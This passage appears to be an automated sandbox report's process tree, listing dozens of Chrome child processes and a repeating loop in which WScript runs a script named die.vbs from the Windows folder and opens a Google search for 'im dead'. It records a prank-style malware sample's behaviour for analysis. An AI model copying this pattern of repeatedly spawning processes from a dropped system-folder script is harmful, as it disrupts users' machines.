        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5000 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:5052
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5192 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:5296
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5372 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:5488
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5540 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:5788
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5756 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:5944
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5900 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:2636
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5692 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:5540
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6512 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:5308
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=6724 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:6252
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5040 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:6524
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5772 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:6740
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6764 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:6936
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6568 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:7112
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6188 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:212
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=4056 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:6448
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4268 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:5588
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6824 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:6848
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6948 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:1052
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=7428 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:5052
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=7268 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:7172
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=8268 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:7308
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7744 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:7520
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=8740 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:7636
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=4804 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:7888
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=8848 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:7992
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=8700 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:1848
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=9656 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:7740
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=6860 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:7508
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=5464 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:7952
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=6756 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:8428
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=10340 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:8544
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=6840 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:8736
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=8720 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:8976
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8368 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:8
        5⤵
        
        PID:8476
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8464 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:8
        5⤵
        
        PID:8660
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8944 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:8
        5⤵
        
        PID:8912
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=10500 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:2
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:8220
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:208
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:2780
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:4524
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:5032
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:4984
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:1156
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:1748
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:5096
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:4852
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:2960
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:5224
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:5248
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:5308
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:5708
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:5724
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:5732
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:6100
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:6116
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:5208
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:6036
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:6052
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:6068
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:6432
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:6456
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:6464
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:6860
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:6876
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:6888
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:6312
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:6344
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:4268
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:5880
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:5948
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:5328
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:6228
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:6296
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:6300
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:6744
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xe0,0xe4,0xd8,0xdc,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:5452
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:7148
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:7440
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:7464
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:7452
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:7788
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:7804
